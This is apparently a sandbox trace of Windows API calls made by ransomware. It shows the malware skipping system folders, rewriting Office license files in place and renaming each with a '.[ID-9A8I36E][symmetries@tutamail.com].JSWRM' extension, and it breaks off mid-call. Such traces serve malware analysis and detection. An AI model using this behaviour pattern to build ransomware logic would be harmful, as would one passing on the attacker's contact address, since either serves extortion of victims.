[0104.696] lstrcmpiW (lpString1="O365HomePremR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0104.696] lstrcmpiW (lpString1="O365HomePremR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0104.696] lstrcmpiW (lpString1="O365HomePremR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.696] lstrcmpiW (lpString1="O365HomePremR_Grace-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.696] lstrcmpiW (lpString1="O365HomePremR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.696] lstrcmpiW (lpString1="O365HomePremR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.696] lstrcmpiW (lpString1="O365HomePremR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.696] lstrcmpiW (lpString1="O365HomePremR_Grace-ppd.xrm-ms", lpString2="msocache") returned 1 [0104.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0104.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Grace-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0104.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0104.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Grace-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2413a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0104.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0104.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0104.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Grace-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0104.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0104.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Grace-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x240f70, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0104.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0104.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0104.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0104.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0104.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.697] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23068) returned 1 [0104.697] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a10) returned 0x24c1d0 [0104.697] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5a10, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5a10, lpOverlapped=0x0) returned 1 [0104.701] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.701] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5a10, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5a10, lpOverlapped=0x0) returned 1 [0104.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.701] CloseHandle (hObject=0x45c) returned 1 [0104.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0104.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0104.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0104.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0104.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0104.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0104.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.702] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0104.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0104.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0104.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0104.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0104.702] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5768162, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5768162, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5800a85, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d68, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_Grace-ul-oob.xrm-ms", cAlternateFileName="O365HO~4.XRM")) returned 1 [0104.702] lstrcmpiW (lpString1="O365HomePremR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.702] lstrcmpiW (lpString1="O365HomePremR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.703] lstrcmpiW (lpString1="O365HomePremR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.703] lstrcmpiW (lpString1="O365HomePremR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.703] lstrcmpiW (lpString1="O365HomePremR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.703] lstrcmpiW (lpString1="O365HomePremR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.703] lstrcmpiW (lpString1="O365HomePremR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.703] lstrcmpiW (lpString1="O365HomePremR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.703] lstrcmpiW (lpString1="O365HomePremR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.703] lstrcmpiW (lpString1="O365HomePremR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0104.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0104.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Grace-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Grace-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22ce70, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0104.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0104.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Grace-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Grace-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0104.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0104.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0104.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0104.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.704] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11624) returned 1 [0104.704] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0104.704] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0104.708] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.708] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0104.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.708] CloseHandle (hObject=0x45c) returned 1 [0104.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0104.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0104.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0104.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0104.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0104.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0104.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.709] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0104.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0104.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0104.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.709] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe578e40e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe578e40e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe58731f5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_Subscription1-pl.xrm-ms", cAlternateFileName="O3470D~1.XRM")) returned 1 [0104.709] lstrcmpiW (lpString1="O365HomePremR_Subscription1-pl.xrm-ms", lpString2=".") returned 1 [0104.709] lstrcmpiW (lpString1="O365HomePremR_Subscription1-pl.xrm-ms", lpString2="..") returned 1 [0104.709] lstrcmpiW (lpString1="O365HomePremR_Subscription1-pl.xrm-ms", lpString2="...") returned 1 [0104.709] lstrcmpiW (lpString1="O365HomePremR_Subscription1-pl.xrm-ms", lpString2="windows") returned -1 [0104.710] lstrcmpiW (lpString1="O365HomePremR_Subscription1-pl.xrm-ms", lpString2="recovery") returned -1 [0104.710] lstrcmpiW (lpString1="O365HomePremR_Subscription1-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.710] lstrcmpiW (lpString1="O365HomePremR_Subscription1-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.710] lstrcmpiW (lpString1="O365HomePremR_Subscription1-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.710] lstrcmpiW (lpString1="O365HomePremR_Subscription1-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.710] lstrcmpiW (lpString1="O365HomePremR_Subscription1-pl.xrm-ms", lpString2="msocache") returned 1 [0104.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0104.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription1-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0104.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription1-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription1-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0104.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0104.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0104.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription1-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0104.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription1-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22ce70, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription1-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0104.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0104.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0104.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0104.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.710] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0104.710] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription1-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription1-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.711] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11199) returned 1 [0104.711] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0104.711] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0104.714] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.714] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0104.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.714] CloseHandle (hObject=0x45c) returned 1 [0104.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0104.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0104.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0104.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0104.714] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0104.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0104.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.714] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription1-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription1-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription1-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription1-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0104.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0104.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0104.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.715] HeapFree (in: hHeap=0x1e0000, 